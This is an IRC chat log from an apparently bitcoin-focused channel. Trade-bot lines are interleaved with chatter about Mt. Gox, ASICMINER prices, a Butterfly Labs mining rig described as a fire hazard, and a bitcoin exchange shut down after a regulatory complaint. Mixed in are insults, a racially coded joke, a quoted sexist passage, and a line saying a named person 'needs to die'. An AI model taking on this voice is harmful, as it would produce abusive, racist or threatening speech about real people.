Jul 03 22:11:44 lol Jul 03 22:11:48 [BTCTC] [TAT.ASICMINER] 20 @ 0.045399 = 0.908 BTC [+] Jul 03 22:11:52 bitcoinbust: why would anyone sell on gox Jul 03 22:12:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.045399 = 0.1816 BTC [+] Jul 03 22:12:03 if you can't get cash out of the insolvent institution Jul 03 22:12:06 makes no sense Jul 03 22:12:07 pretty sure they are still processing some transfers Jul 03 22:12:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.0452 = 0.226 BTC [-] Jul 03 22:12:13 unless they want to rebuy Jul 03 22:12:14 unlawful cozenager! Jul 03 22:12:21 im not sure bugpowder Jul 03 22:12:26 gotta land Jul 03 22:12:29 on a plane Jul 03 22:12:30 [BTCTC] [AMC-PT] 20 @ 0.002 = 0.04 BTC [-] Jul 03 22:12:31 laterz Jul 03 22:12:41 [BTCTC] [AMC-PT] 14 @ 0.001992 = 0.0279 BTC [-] Jul 03 22:12:44 [BTCTC] [AMC-PT] 25 @ 0.001991 = 0.0498 BTC [-] Jul 03 22:12:47 :) Jul 03 22:12:48 [BTCTC] [AMC-PT] 100 @ 0.00199 = 0.199 BTC [-] Jul 03 22:12:51 [BTCTC] [AMC-PT] 1023 @ 0.001951 = 1.9959 BTC [-] Jul 03 22:12:55 [BTCTC] [TAT.ASICMINER] 11 @ 0.0452 = 0.4972 BTC [-] Jul 03 22:13:00 remind me not to fly an airline where the pilot is on irc Jul 03 22:13:02 hey, amc-pt is like all up to 25 Jul 03 22:13:11 dub haha i was thinking, wtf, is he the pilot Jul 03 22:13:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.045499 BTC [+] Jul 03 22:13:49 [BTCTC] [TAT.ASICMINER] 35 @ 0.045499 = 1.5925 BTC [+] Jul 03 22:13:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.045499 = 0.091 BTC [+] Jul 03 22:13:54 no no Jul 03 22:14:01 he's landing ON the plane Jul 03 22:14:07 with his plane Jul 03 22:14:07 to corporate espionage Jul 03 22:14:09 [BTCTC] [TAT.ASICMINER] 12 @ 0.045499 = 0.546 BTC [+] Jul 03 22:14:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.045499 = 0.2275 BTC [+] Jul 03 22:14:26 like james bond n shit Jul 03 22:14:27 i have a neighbour that can't cook Jul 03 22:14:28 but badly so. Jul 03 22:14:40 i think i may go there and beat her. Jul 03 22:15:22 mircea how do you deal with losing huge net worth everyday on this price decline? Jul 03 22:15:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.048 = 0.192 BTC [+] Jul 03 22:15:47 by not giving a shit. Jul 03 22:15:50 what difference does it make ? Jul 03 22:16:02 [BTCTC] [TAT.ASICMINER] 18 @ 0.048 = 0.864 BTC [+] Jul 03 22:16:06 aww guys, stop feeding the troll Jul 03 22:16:13 [BTCTC] [TAT.ASICMINER] 15 @ 0.045499 = 0.6825 BTC [-] Jul 03 22:16:16 ThickAsThieves he's not really fucked up yet tbh Jul 03 22:16:18 Why didn't you ask when BTC was around 50 how he felt for the massive increase in net worth from the 10 -> 50 USD per BTC price increase? Jul 03 22:16:25 give it time... Jul 03 22:16:27 Namworld or 250 for that matter. Jul 03 22:16:30 [BTCTC] [BITVPS] 2 @ 0.0025 = 0.005 BTC [-] Jul 03 22:16:35 It went both way. Jul 03 22:16:38 [BTCTC] [ASICMINER-PT] 1 @ 4.27 BTC [-] Jul 03 22:16:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.0483 = 0.1449 BTC [+] Jul 03 22:16:45 [BTCTC] [ASICMINER-PT] 2 @ 4.27 = 8.54 BTC [-] Jul 03 22:16:49 [BTCTC] [ASICMINER-PT] 1 @ 4.265301 BTC [-] Jul 03 22:16:54 [BTCTC] [ASICMINER-PT] 4 @ 4.2653 = 17.0612 BTC [-] Jul 03 22:17:09 [BTCTC] [ASICMINER-PT] 2 @ 4.2653 = 8.5306 BTC [-] Jul 03 22:17:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0483 BTC [+] Jul 03 22:17:26 [BTCTC] [TAT.ASICMINER] 100 @ 0.03 = 3 BTC [-] Jul 03 22:17:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.046 = 0.138 BTC [+] Jul 03 22:17:51 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 03 22:17:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.046 = 0.092 BTC [+] Jul 03 22:18:10 [BTCTC] [TAT.ASICMINER] 96 @ 0.0483 = 4.6368 BTC [+] Jul 03 22:18:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.0488 = 0.244 BTC [+] Jul 03 22:18:26 [BTCTC] [TAT.ASICMINER] 80 @ 0.04888 = 3.9104 BTC [+] Jul 03 22:18:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.049 = 0.147 BTC [+] Jul 03 22:18:33 [BTCTC] [TAT.ASICMINER] 7 @ 0.0495 = 0.3465 BTC [+] Jul 03 22:18:37 [BTCTC] [TAT.ASICMINER] 30 @ 0.05 = 1.5 BTC [+] Jul 03 22:18:44 [BTCTC] [TAT.ASICMINER] 30 @ 0.05 = 1.5 BTC [+] Jul 03 22:18:53 wtf Jul 03 22:18:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0465 BTC [-] Jul 03 22:18:59 srsly Jul 03 22:19:00 [BTCTC] [AMC-PT] 6 @ 0.00219 = 0.0131 BTC [+] Jul 03 22:19:01 WTF indeed... Jul 03 22:19:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0455 BTC [-] Jul 03 22:19:07 With capital letters... Jul 03 22:19:10 [BTCTC] [TAT.ASICMINER] 18 @ 0.045499 = 0.819 BTC [-] Jul 03 22:19:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.045201 BTC [-] Jul 03 22:19:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.0452 = 0.226 BTC [-] Jul 03 22:19:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [-] Jul 03 22:19:34 what did i miss ? Jul 03 22:19:40 [15:18] <@assbot> [BTCTC] [TAT.ASICMINER] 30 @ 0.05 = 1.5 BTC [+] Jul 03 22:19:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 03 22:19:46 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [+] Jul 03 22:19:47 [BTCTC] [TAT.ASICMINER] 11 @ 0.045 = 0.495 BTC [-] Jul 03 22:19:51 options, neh ? Jul 03 22:19:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0443 BTC [-] Jul 03 22:19:52 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jul 03 22:19:54 [BTCTC] [TAT.ASICMINER] 11 @ 0.044 = 0.484 BTC [-] Jul 03 22:20:05 nope Jul 03 22:20:11 for realsies this time Jul 03 22:20:12 /sarcasm Jul 03 22:20:15 [BTCTC] [TAT.ASICMINER] 38 @ 0.043502 = 1.6531 BTC [-] Jul 03 22:20:21 [BTCTC] [TAT.ASICMINER] 16 @ 0.043501 = 0.696 BTC [-] Jul 03 22:20:42 [BTCTC] [TAT.ASICMINER] 16 @ 0.043501 = 0.696 BTC [-] Jul 03 22:20:43 it's a rollercoaster of fun! Jul 03 22:21:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.043501 BTC [-] Jul 03 22:21:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.043501 = 0.522 BTC [-] Jul 03 22:21:34 well... 4 is still a pretty good price. Jul 03 22:21:39 [BTCTC] [TAT.ASICMINER] 17 @ 0.043501 = 0.7395 BTC [-] Jul 03 22:21:44 [BTCTC] [TAT.ASICMINER] 35 @ 0.0435 = 1.5225 BTC [-] Jul 03 22:21:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.0435 = 0.174 BTC [-] Jul 03 22:21:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.0431 = 0.0862 BTC [-] Jul 03 22:21:55 [BTCTC] [TAT.ASICMINER] 28 @ 0.04301 = 1.2043 BTC [-] Jul 03 22:21:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.043007 = 0.8601 BTC [-] Jul 03 22:21:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.043005 = 0.172 BTC [-] Jul 03 22:22:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.043005 = 0.086 BTC [-] Jul 03 22:22:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.043003 = 0.43 BTC [-] Jul 03 22:22:05 [BTCTC] [TAT.ASICMINER] 20 @ 0.043001 = 0.86 BTC [-] Jul 03 22:22:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.043 = 0.215 BTC [-] Jul 03 22:22:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [-] Jul 03 22:22:22 [BTCTC] [TAT.ASICMINER] 30 @ 0.0427 = 1.281 BTC [-] Jul 03 22:22:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.0427 = 0.1281 BTC [-] Jul 03 22:22:25 [BTCTC] [TAT.ASICMINER] 73 @ 0.042555 = 3.1065 BTC [-] Jul 03 22:22:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.04999 = 0.1 BTC [+] Jul 03 22:22:40 4? No... Jul 03 22:22:44 [15:16] <@assbot> [BTCTC] [TAT.ASICMINER] 15 @ 0.045499 = 0.6825 BTC [-] Jul 03 22:22:49 [15:17] <@assbot> [BTCTC] [TAT.ASICMINER] 100 @ 0.03 = 3 BTC [-] Jul 03 22:22:53 [15:18] <@assbot> [BTCTC] [TAT.ASICMINER] 30 @ 0.05 = 1.5 BTC [+] Jul 03 22:23:08 4.5 > 3 > 5 within 3 minutes. Jul 03 22:23:30 Not the drop back to 4 - 4.5 range Jul 03 22:23:49 [BTCTC] [ASICMINER-PT] 7 @ 4.649999 = 32.55 BTC [+] Jul 03 22:24:17 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [+] Jul 03 22:24:21 without insulting our thick friend, i imagine his vehicle isn;t necessarily the best proxy for asicminer. Jul 03 22:24:27 [BTCTC] [BFMINES] 1 @ 0.004 BTC Jul 03 22:24:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.0485 = 0.097 BTC [-] Jul 03 22:24:59 Cool, only 78K contracts left to sell. Jul 03 22:25:11 The Opportunity Costs of Prostitution Jul 03 22:25:11 In life a woman can’t be “a wife and a prostitute” at the same time. Men are biologically driven to want faithful wives. Jul 03 22:25:32 dude the shit i read. what the fuck is wrong with people that makes idiots write in the first place ?! Jul 03 22:26:18 other people who read them? Jul 03 22:26:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.0485 = 0.1455 BTC [-] Jul 03 22:26:23 [BTCTC] [AMC-PT] 29 @ 0.002 = 0.058 BTC [-] Jul 03 22:26:30 not sure what you mean mp? Jul 03 22:26:38 or am i missing half the conversation Jul 03 22:27:35 ThickAsThieves well i dunno, be moar explicit! Jul 03 22:27:49 [BTCTC] [DMS.PURCHASE] 4 @ 0.049273 = 0.1971 BTC [-] Jul 03 22:27:53 jurov awww touche Jul 03 22:27:53 [BTCTC] [TAT.ASICMINER] 18 @ 0.048301 = 0.8694 BTC [-] Jul 03 22:27:57 [BTCTC] [TAT.ASICMINER] 55 @ 0.0485 = 2.6675 BTC [+] Jul 03 22:27:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.049 = 0.539 BTC [+] Jul 03 22:28:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.049 BTC [+] Jul 03 22:28:03 [15:24] without insulting our thick friend, i imagine his vehicle isn;t necessarily the best proxy for asicminer. <<<< what is that referring to Jul 03 22:28:25 [BTCTC] [S.DICE-PT] 23 @ 0.0022 = 0.0506 BTC [-] Jul 03 22:28:29 True. But regardless, seeing such thing happen on anything just goes to prove how silly people can be. Jul 03 22:28:31 [BTCTC] [BFMINES] 5 @ 0.004 = 0.02 BTC Jul 03 22:28:43 ThickAsThieves Namworld was discussing tat.am price evolution a few lines above Jul 03 22:28:54 [BTCTC] [AMC-PT] 4 @ 0.00204 = 0.0082 BTC [+] Jul 03 22:28:56 [MPEX] [S.MPOE] 4858 @ 0.0007793 = 3.7858 BTC [-] Jul 03 22:29:03 the 3 was an options excercie Jul 03 22:29:18 the rollercoaster is happening to AM-PT too Jul 03 22:29:23 Fancy Jul 03 22:29:26 [BTCTC] [BITVPS] 10 @ 0.002032 = 0.0203 BTC [-] Jul 03 22:29:39 [BTCTC] [ASICMINER-PT] 1 @ 4.70001 BTC [+] Jul 03 22:29:45 [BTCTC] [RSM] 4 @ 0.016006 = 0.064 BTC [+] Jul 03 22:29:47 [BTCTC] [DMS.MINING] 1 @ 0.020897 BTC [-] Jul 03 22:29:54 well ya Jul 03 22:30:02 all AM PTs tend to have shitty bid depth Jul 03 22:30:09 but better than many assets Jul 03 22:30:13 [BTCTC] [BITVPS] 1 @ 0.002031 BTC [-] Jul 03 22:30:29 [BTCTC] [BITVPS] 2 @ 0.002 = 0.004 BTC [-] Jul 03 22:30:53 [BTCTC] [TAT.ASICMINER] 50 @ 0.0444 = 2.22 BTC [-] Jul 03 22:30:56 i just meant he's pushing the argument quoting that 3-5 movement, simmar down. Jul 03 22:31:18 i'm calm dont worry Jul 03 22:31:20 [BTCTC] [ASICMINER-PT] 1 @ 4.661 BTC [-] Jul 03 22:31:26 [BTCTC] [TAT.ASICMINER] 12 @ 0.0444 = 0.5328 BTC [-] Jul 03 22:31:46 no no U R ANGREY Jul 03 22:31:50 NOU! Jul 03 22:31:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0444 BTC [-] Jul 03 22:32:02 oh wow Jul 03 22:32:02 the jig is up! Jul 03 22:32:06 did AM pop after divs? Jul 03 22:32:10 [BTCTC] [TAT.ASICMINER] 32 @ 0.0444 = 1.4208 BTC [-] Jul 03 22:32:12 is now a good time to buy? Jul 03 22:32:19 I will take 1 asicminer please Jul 03 22:32:21 dont make me get my corporate ninjas all up in your exchange Jul 03 22:32:31 ThickAsThieves: you live in the boonies Jul 03 22:32:38 my exchange is high fantasy. strictly no ninjas. Jul 03 22:32:39 do they even have ninjas in tifton? Jul 03 22:32:39 i know a target for Success Victimization when i see one Jul 03 22:32:48 do they even have ninjas in tifton? <<< ahahaha epic. Jul 03 22:33:19 funny enough Jul 03 22:33:27 its what they call black folks around here Jul 03 22:33:50 you just don't see the full humour of it Jul 03 22:33:52 because tifton Jul 03 22:33:57 yknow cuz it sounds nicer Jul 03 22:34:02 [MPEX] [S.MPOE] 1000 @ 0.00078602 = 0.786 BTC [+] Jul 03 22:34:04 i know nothing of tifton Jul 03 22:34:11 [BTCTC] [BMF] 1 @ 0.038 BTC [+] Jul 03 22:34:20 explaining the joke will surely make it funnier Jul 03 22:34:26 :) Jul 03 22:34:45 [BTCTC] [ASICMINER-PT] 1 @ 4.58 BTC [-] Jul 03 22:34:51 [BTCTC] [ASICMINER-PT] 19 @ 4.55 = 86.45 BTC [-] Jul 03 22:34:53 [BTCTC] [RSM] 9 @ 0.016006 = 0.1441 BTC [+] Jul 03 22:35:03 The racial makeup of the city was 61.26% White, 31.57% African American << i have been scammed. Jul 03 22:35:24 Atlanta is higher i think Jul 03 22:35:26 [BTCTC] [ASICMINER-PT] 1 @ 4.5801 BTC [+] Jul 03 22:35:30 I think that's about the makup of Lansing too? Jul 03 22:35:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.047299 = 0.2365 BTC [+] Jul 03 22:35:36 [BTCTC] [ASICMINER-PT] 1 @ 4.55 BTC [-] Jul 03 22:35:42 [BTCTC] [ASICMINER-PT] 1 @ 4.649 BTC [+] Jul 03 22:35:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.047299 = 0.0946 BTC [+] Jul 03 22:36:08 prolly Jul 03 22:36:17 [BTCTC] [ASICMINER-PT] 6 @ 3.55 = 21.3 BTC [-] Jul 03 22:36:34 i think some people call Atlant the Black Hollywood now... Jul 03 22:36:35 [BTCTC] [AMC-PT] 100 @ 0.00195 = 0.195 BTC [-] Jul 03 22:36:38 [BTCTC] [AMC-PT] 514 @ 0.00194 = 0.9972 BTC [-] Jul 03 22:36:53 which is retarded Jul 03 22:37:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.047299 = 0.2365 BTC [+] Jul 03 22:37:31 [BTCTC] [B.YABMC] 1 @ 0.006498 BTC [+] Jul 03 22:37:44 [BTCTC] [AMC-PT] 1 @ 0.001917 BTC [-] Jul 03 22:37:47 [BTCTC] [AMC-PT] 209 @ 0.001913 = 0.3998 BTC [-] Jul 03 22:37:48 [BTCTC] [AMC-PT] 241 @ 0.001913 = 0.461 BTC [-] Jul 03 22:38:07 ;;ticker Jul 03 22:38:08 MtGox BTCUSD ticker | Best bid: 83.60000, Best ask: 84.07746, Bid-ask spread: 0.47746, Last trade: 83.60000, 24 hour volume: 42951.36043565, 24 hour low: 81.86753, 24 hour high: 91.20000, 24 hour vwap: 86.14795 Jul 03 22:38:33 [BTCTC] [AMC-PT] 1 @ 0.001913 BTC [-] Jul 03 22:38:55 http://buttcoin.org/butterfly-labs-mini-rig-is-a-huge-broken-unstable-piece-of-shit Jul 03 22:39:24 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [+] Jul 03 22:39:35 but they delivered! Bitbet is a scam! rawr! Jul 03 22:42:26 ThickAsThieves: CoinBr.iDiff-E was just considerably repriced ;) Jul 03 22:42:53 Also, if you didn’t notice, the LCD/Phone thingy in the front has been replaced by … a piece of cardboard spray painted black. Wonderful. Jul 03 22:42:58 actually i totally missed that. LOL Jul 03 22:43:04 Sweet, tennis parlay came thru Jul 03 22:43:11 Jurov, I see no asks Jul 03 22:43:28 mah lord, I had not yet explored the buttcoin site... thanks TAT! Jul 03 22:43:40 if only for the infograph Jul 03 22:43:51 http://buttcoin.org/wp-content/uploads/2011/06/buttcoin-infograph.png Jul 03 22:44:08 ThickAsThieves: then we should perhaps bother Ukto.. or do you mean bids? Jul 03 22:44:31 well i assume you are selling Es Jul 03 22:44:40 but I see no orders either way Jul 03 22:44:45 oh wait Jul 03 22:44:48 wrong asset Jul 03 22:45:11 i think i'll skip this time Jul 03 22:45:19 opp cost was pretty high for me Jul 03 22:45:28 who runs buttcoin Jul 03 22:45:46 [BTCTC] [GSDPT] 15 @ 0.00238 = 0.0357 BTC [+] Jul 03 22:46:20 heheheh Jul 03 22:46:53 ThickAsThieves: you were looking at MPBPT-E? that one needs prolly asking winklevosses for spare 100BTC lying around Jul 03 22:48:16 bitcoinbust sa prolly. Jul 03 22:48:35 sa? Jul 03 22:48:46 [BTCTC] [TAT.ASICMINER] 20 @ 0.04601 = 0.9202 BTC [-] Jul 03 22:49:00 buttcoin.org is amusing but it does seem the owner is upset over bitcoins price appreciation Jul 03 22:49:08 as in missing out Jul 03 22:49:16 "This is incredibly dangerous since it is doing neutral line loading. If that is fucking with a dudes pool then it is sourcing current from neutral which is a big no no. It is a really easy way to start an electrical fire. I am actually wondering if this has to pass UL or CE testing to ship legally in the US or Canada" Jul 03 22:49:30 no, actually, it got stopped at the german customs for having fraudulently claimed ce certification Jul 03 22:49:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.047298 = 0.1892 BTC [+] Jul 03 22:49:37 and they're currently awaiting being banned in the eu. Jul 03 22:49:43 it's a total hack job Jul 03 22:49:45 which you know... two weeks. Jul 03 22:49:46 [BTCTC] [RSM] 3 @ 0.016005 = 0.048 BTC [-] Jul 03 22:49:46 lol Jul 03 22:49:53 everyone just slaps a sticker on it Jul 03 22:49:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.047297 = 0.1419 BTC [-] Jul 03 22:49:58 damn those UL stickers Jul 03 22:50:03 hot glue and electrical tape... Jul 03 22:50:11 Sourcing current from neutral is fine, and is standard practice. Jul 03 22:50:12 so far the US has contributed nothing to bitcoin but scams and bad press Jul 03 22:50:15 deadweasel the neutral charging issue is significant Jul 03 22:50:17 Sourcing from ground is not fine. Jul 03 22:50:41 [BTCTC] [TAT.ASICMINER] 6 @ 0.047297 = 0.2838 BTC [-] Jul 03 22:50:42 B0g4r7 moreover... they're using consumer grade evga, which normally woulsdn't be doing this Jul 03 22:50:45 so they fucked with it somehow. Jul 03 22:50:50 [BTCTC] [BFMINES] 1 @ 0.004 BTC Jul 03 22:50:50 that thing will catch on fire. Jul 03 22:51:00 [MPEX] [S.MPOE] 6296 @ 0.00078069 = 4.9152 BTC [-] Jul 03 22:51:19 [BTCTC] [RSM] 7 @ 0.016 = 0.112 BTC [-] Jul 03 22:51:28 firebox. i hope is 240v rewire doesn't kill him. Jul 03 22:51:32 *his Jul 03 22:51:47 deaths by bitcoin today: 0 Jul 03 22:51:51 tomorrow: ? Jul 03 22:51:53 it is seriously dangerous. Jul 03 22:52:09 i mean, the antics with running exposed video cards / dumping nitro on the floor/ etc Jul 03 22:52:12 that can all be good humour Jul 03 22:52:20 [BTCTC] [ASICMINER-PT] 1 @ 4.669999 BTC [+] Jul 03 22:52:22 http://imgur.com/a/Uanjr#23 <---tear down album Jul 03 22:52:25 but by now it's veerying into the actually criminal. Jul 03 22:52:26 mircea_popescu: SA? Jul 03 22:52:28 Butterfly Labs (BFL) Mini-Rig - Imgur Jul 03 22:52:34 bitcoinbust something awful. it's a forum. Jul 03 22:53:16 the airflow looks stupid too Jul 03 22:53:54 o/ DeaDTerra1 Jul 03 22:53:58 [BTCTC] [ASICMINER-PT] 5 @ 4.75 = 23.75 BTC [+] Jul 03 22:54:05 [BTCTC] [ASICMINER-PT] 5 @ 4.78 = 23.9 BTC [+] Jul 03 22:54:08 like the hot glued usbs Jul 03 22:54:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.047297 BTC [-] Jul 03 22:54:58 not an electrical engineer, so can someone explain the reasoning of the gluing usbs ? Jul 03 22:55:09 i've never had a usb fall out of its socket myself Jul 03 22:55:38 buttcoin.org can only successfully argue the stupidity of bitcoiners, their arguements against bitcoin itself are lame Jul 03 22:55:43 shipping, vibrations, people agrily smacking their machine. Jul 03 22:55:48 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.004376 = 0.0394 BTC [+] Jul 03 22:55:52 *angrily Jul 03 22:56:07 it's a signature of craftsmanship Jul 03 22:56:17 [BTCTC] [CRYPTO-TRADE] 1 @ 0.196001 BTC [+] Jul 03 22:56:35 likely they are trying to prvent CS calls Jul 03 22:56:35 also used on the internals of some knock of stereo gear from Behringer I have. Jul 03 22:56:37 so BFL's cases look good, but it's only to hide the shit Jul 03 22:56:45 [BTCTC] [CRYPTO-TRADE] 4 @ 0.196001 = 0.784 BTC [+] Jul 03 22:56:47 "Have you checked all 20 USBs?" Jul 03 22:57:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.04602 BTC [-] Jul 03 22:57:15 Bugpowder, i got a set of speakers like that before, but I paid $100, not $22,000. Jul 03 22:57:22 yeah Jul 03 22:57:26 same here Jul 03 22:57:29 [BTCTC] [TAT.ASICMINER] 24 @ 0.04602 = 1.1045 BTC [-] Jul 03 22:57:41 they worked great tho. hot glue is where it's at ;) Jul 03 22:57:42 there was a mount broken on the inside when delivered Jul 03 22:57:52 hot glued back in place Jul 03 22:57:59 nice QC there fellas Jul 03 22:58:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.047298 = 0.473 BTC [+] Jul 03 22:58:15 LOL Jul 03 22:58:22 new add on JD Jul 03 22:58:23 http://www.thebitmunchies.com Jul 03 22:58:29 buttcoin.org can only successfully argue the stupidity of bitcoiners, their arguements against bitcoin itself are lame << after about two years of trying they've pretty much figured that out themselves yes. Jul 03 22:58:32 $22k and here is your sword of damocles, enjoy! Jul 03 22:58:34 this is some pets.com shit right here Jul 03 22:58:40 kozmo Jul 03 22:58:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.047298 = 0.1419 BTC [+] Jul 03 22:59:34 we crashed buttcoin Jul 03 22:59:40 we did Jul 03 22:59:43 ok, broken cvonnectors, i can sdee. but those seem fine. anyway,. Jul 03 23:00:10 stupid -assets, always ddosing Jul 03 23:00:22 topace was saying that somoene is grabbing IPs from in channel and DDOSing Jul 03 23:00:25 at least for him Jul 03 23:00:30 havelock is down Jul 03 23:00:46 and then when he connected via his guest wifi Jul 03 23:00:50 the ddos'd that too Jul 03 23:01:02 they* Jul 03 23:01:31 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 03 23:01:33 well the later part is problematic Jul 03 23:01:36 [BTCTC] [ASICMINER-PT] 13 @ 4.7 = 61.1 BTC [-] Jul 03 23:01:37 o you mean connected here ? Jul 03 23:01:52 or in his channel Jul 03 23:01:56 aha Jul 03 23:02:11 #canadianbitcoins Jul 03 23:02:14 [BTCTC] [AMC-PT] 6 @ 0.002011 = 0.0121 BTC [+] Jul 03 23:02:29 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jul 03 23:02:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.047298 = 0.473 BTC [+] Jul 03 23:03:18 tor-sasl is always an option, no? Jul 03 23:03:28 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 03 23:03:37 [BTCTC] [AMC-PT] 1 @ 0.002011 BTC [+] Jul 03 23:03:54 the canadian exchange has probably been the most reputable one too date Jul 03 23:03:58 but its fees are high Jul 03 23:04:08 i guess in bitcoinland reputation costs money since 99% of it is scum. Jul 03 23:05:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.047298 = 0.1892 BTC [+] Jul 03 23:05:20 [BTCTC] [AMC-PT] 1 @ 0.002011 BTC [+] Jul 03 23:05:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.047298 = 0.0946 BTC [+] Jul 03 23:05:45 [BTCTC] [AMC-PT] 45 @ 0.002011 = 0.0905 BTC [+] Jul 03 23:05:51 ok maybe you are more reasonable than i thought Jul 03 23:07:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004376 BTC [+] Jul 03 23:07:24 I don't think you can get cash out from cavertix to US though Jul 03 23:07:25 anyone tried https://fbtcexchange.com/ ? Jul 03 23:07:30 thickasthieves youve got the IQ of a bag of hair as far as im concerned. Jul 03 23:07:32 dutch exchange Jul 03 23:07:34 I miss fastcash4bitcoins Jul 03 23:07:39 oh geez Jul 03 23:07:42 yea that was a great service Jul 03 23:07:45 i doubt dt's coming back tho Jul 03 23:07:47 and how did you come to that conclusion Jul 03 23:07:49 [BTCTC] [DMS.PURCHASE] 25 @ 0.049273 = 1.2318 BTC [-] Jul 03 23:08:08 thickasthieves: only one dumber then you in this channel is jcpham. Jul 03 23:08:15 lol Jul 03 23:08:18 wat? Jul 03 23:08:22 TAT? Jul 03 23:08:29 he is like top 50% for sure Jul 03 23:08:33 lol Jul 03 23:08:38 top 90% Jul 03 23:08:40 bugpowder: im pretty sure someone informed on fastcash4bitcoins Jul 03 23:08:45 everyone's in the top 50% for sure wtf. Jul 03 23:08:51 someone informed? Jul 03 23:08:52 you guys are so kind Jul 03 23:08:55 like the fucking bank Jul 03 23:09:01 bugpowder: no a user Jul 03 23:09:03 dude was moving tons of cash Jul 03 23:09:11 they would have told him to fuck off. Jul 03 23:09:20 someone filed a compliant with that agency in virginia Jul 03 23:09:34 and then there was the time were the client had him send the withdrawal directly to clients criminal attorney. Jul 03 23:09:49 you do realize in the US, government agencies dont do anything unless 1) you provoke them 2) someone informs on you Jul 03 23:10:00 [BTCTC] [TAT.ASICMINER] 9 @ 0.047298 = 0.4257 BTC [+] Jul 03 23:10:08 tell me how it works Jul 03 23:10:15 bugpowder: someone went and filed a complaint with that agency Jul 03 23:10:18 its my favorite part of this channel Jul 03 23:10:22 it was probably peter vessennes Jul 03 23:10:26 lol Jul 03 23:10:28 that dude Jul 03 23:10:28 o,o Jul 03 23:10:32 needs to die Jul 03 23:10:32 since he said he was "weeding out the bad actors" Jul 03 23:10:39 oh my god Jul 03 23:10:44 now look. it's possible tho by no means necessary somebody filed a complaint Jul 03 23:10:48 dude is so full of shit Jul 03 23:10:50 but i mean wtf, why not pirate Jul 03 23:10:51 bullshit mircea Jul 03 23:11:08 you are so tiberslav aren't you Jul 03 23:11:09 [BTCTC] [ASICMINER-PT] 1 @ 4.73 BTC [+] Jul 03 23:11:10 US government agencies rarely look into things by themselves Jul 03 23:11:17 vessenes is famous for sauyiong all sorts of things and never carrying through Jul 03 23:11:27 i guess thats true too Jul 03 23:11:39 i dun see why you'd expect him to perform in whatever random god-given mission he's called himself to for no reason Jul 03 23:11:40 someone still filed a complaint against fastcash4bitcoins Jul 03 23:12:13 and the fact that it was a state agency that told him to stop proves it Jul 03 23:12:20 those guys are always behind the curve Jul 03 23:12:25 [BTCTC] [BITVPS] 1 @ 0.0005 BTC [-] Jul 03 23:12:28 not really. banks have mandatory reporting shit pushed on them daily. Jul 03 23:12:39 which is simple forms to fill out Jul 03 23:12:47 that get stacked up and never looked at Jul 03 23:13:24 [BTCTC] [ASICMINER-PT] 2 @ 3.2 = 6.4 BTC [-] Jul 03 23:13:24 not very nice fuckhead Jul 03 23:13:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.047298 = 0.1892 BTC [+] Jul 03 23:13:32 especially with people in my office Jul 03 23:13:36 We take this step in response to a notice received on the same day from the Commonwealth of Virginia that a complaint has been made that our company is operating as an unlicensed money transmitter. Jul 03 23:13:38 [BTCTC] [AMC-PT] 4 @ 0.002011 = 0.008 BTC [+] Jul 03 23:14:35 the complaint can come from a private party or from w/e agency Jul 03 23:14:36 ThickAsThieves what did you do? did you speak too? Jul 03 23:14:46 where is tiberiusv? where is eskimobob Jul 03 23:14:53 mircea_popescu: i assume it was a private party Jul 03 23:14:59 i unignored him, that was my only real mistake Jul 03 23:15:03 [BTCTC] 